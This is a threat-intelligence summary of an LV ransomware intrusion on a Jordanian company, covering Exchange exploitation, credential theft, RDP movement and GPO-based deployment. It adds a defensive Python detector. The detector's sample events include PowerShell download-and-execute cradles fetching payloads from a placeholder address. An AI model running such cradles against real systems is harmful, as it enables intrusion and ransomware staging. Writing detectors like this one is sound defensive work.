Analysis of a LV Ransomware Attack Against a Jordan-based Company
Category: Ransomware News | Industries: Engineering, Energy, Financial Services, Food & Beverage, Healthcare, Hospitality, Insurance, Manufacturing, Retail, Technology, Transportation | Level: Tactical | Source: Trend Micro
Trend Micro researchers shared updated threat activity associated with the LV ransomware group, providing an intrusion analysis of a ransomware attack against a company based in Jordan. Consolidating the breaches the group conducted in 2022, its victimology shows Europe, North America, Asia, and the Middle East as the most impacted regions. A post the group made on a cybercrime forum in December 2021 showed an interest in buying credentials for organizations in Canada, Europe, and the United States with revenue over $100,000. From a vertical perspective, the group attacks a wide range of industries, the top five being manufacturing, technology, retail, engineering, and financial services. In the same post the group also expressed interest in verticals outside of healthcare, education, and government, although it has targeted those industries before. The intrusion analysis revealed the operational tools, tactics, and procedures (TTPs) the ransomware operators used in the attack against the Jordan-based company in September 2022. Initial access was obtained by exploiting the ProxyLogon and ProxyShell vulnerabilities on Exchange servers. Once inside the environment, the operators ran a PowerShell Invoke-Expression command to download and execute a PowerShell backdoor file. The IP address the backdoor was downloaded from is the same source that supplied the tunneling tool the operators later used for data exfiltration. Mimikatz was run for credential access, and reconnaissance tools were executed to scan the victim's network. The operators also logged into several compromised accounts over the remote desktop protocol (RDP) before concluding activity for the day. Activity resumed and was completed the following day, September 9th, 2022, when the operators obtained access to a domain controller using RDP.
Ransomware deployment was staged through a group policy object that created a scheduled task, which in turn executed a batch script to launch the ransomware. The ransom note instructs the victim to contact the ransomware group through its TOR website.
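The chain above (an Invoke-Expression download cradle, a second download from the same staging address, and a batch script launched from SYSVOL by a scheduled task) maps directly onto process-creation telemetry. The following Python is an added detection example, not code from Trend Micro or Anvilogic; the events, hostnames and the 192.0.2.10 staging address are constructed, and the SYSVOL/svchost.exe conditions are assumptions about how a GPO-created task would appear.

```python
import re

# Constructed sample process-creation events (not from the Trend Micro report).
# Fields: (hostname, parent image, command line). 192.0.2.10 is a documentation
# address standing in for the server that served both the backdoor and the tunnel tool.
SAMPLE_EVENTS = [
    ("EXCH01", r"C:\Windows\System32\inetsrv\w3wp.exe",
     "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/ps.txt')\""),
    ("WS07", r"C:\Windows\System32\cmd.exe",
     "powershell.exe -c \"Invoke-WebRequest http://192.0.2.10/t.exe -OutFile C:\\Users\\Public\\t.exe\""),
    ("WS12", r"C:\Windows\System32\svchost.exe",   # Task Scheduler host process (assumption)
     "cmd.exe /c \\\\corp.example\\SYSVOL\\corp.example\\scripts\\run.bat"),
    ("WS03", r"C:\Windows\explorer.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
]

IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DOWNLOAD = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)", re.I)
SYSVOL_BAT = re.compile(r"\\sysvol\\.*\.bat\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.I)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")

def rules_for(parent, cmd):
    """Return the names of the single-event rules that fire on one process creation."""
    hits = []
    child = (cmd.split() or [""])[0].lower()
    if IEX.search(cmd) and DOWNLOAD.search(cmd):
        hits.append("iex_download_cradle")          # the backdoor download in the report
    if parent.lower().endswith("w3wp.exe") and child in SHELLS:
        hits.append("exchange_worker_spawned_shell")  # post-ProxyShell web shell activity
    if parent.lower().endswith("svchost.exe") and SYSVOL_BAT.search(cmd):
        hits.append("gpo_sysvol_batch_task")         # scheduled task running the GPO batch script
    return hits

def analyze(events):
    """Per-event rules plus one cross-event correlation: once an address has served an
    IEX cradle, any later download from that same address (e.g. the tunnel tool) is flagged."""
    staging, findings = set(), []
    for hostname, parent, cmd in events:
        hits = rules_for(parent, cmd)
        hosts = {h.lower() for h in URL_HOST.findall(cmd)}
        if "iex_download_cradle" in hits:
            staging |= hosts
        elif DOWNLOAD.search(cmd) and hosts & staging:
            hits.append("download_from_known_staging_host")
        if hits:
            findings.append((hostname, hits))
    return findings

if __name__ == "__main__":
    for hostname, hits in analyze(SAMPLE_EVENTS):
        print(hostname, ", ".join(hits))
```

Because the correlation is order-dependent, feed events to `analyze` in timestamp order; a plain `Invoke-WebRequest` is only escalated once the same address has already appeared in a cradle.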
- PowerShell Download Leads to Credential Access/Tunnel & RDP
Anvilogic Use Cases:
- Invoke-WebRequest Command
- Tunneling Process Created
- Modify Group Policy